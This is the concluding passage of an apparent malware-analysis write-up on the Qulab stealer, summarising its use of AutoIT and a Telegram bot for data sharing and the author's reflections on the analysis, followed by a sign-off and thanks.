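Short markers such as "SDA" match a lot of unrelated data on their own, which is why the condition requires every string at once.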
Conclusion
Well, it's cool sometimes to dig into something that is not really common in terms of language choice (from my point of view, for this malware). It's entertaining and always worthwhile to learn new content, find new tools, and find a new perspective by diving into some totally unknown fields.
Qulab stealer is interesting just for the fact that it's using AutoIT and abusing a Telegram bot to share some data, but the stealing & clipper features remain the same as in all the other stealers. It also confirms that more and more people are using free User Defined Functions/libraries to do good or bad things. This trend will become more and more common: developers or simple users lacking skills now just do some Google research and are able to make software or malware without knowing anything in depth about what the code is doing. When the task is done, nothing else matters in the end.
But I admit, I really take pleasure in patching it for stupid & totally useless stuff.
Now it's time for a break.
#HappyHunting
Special thanks: @siri_urz, @hh86_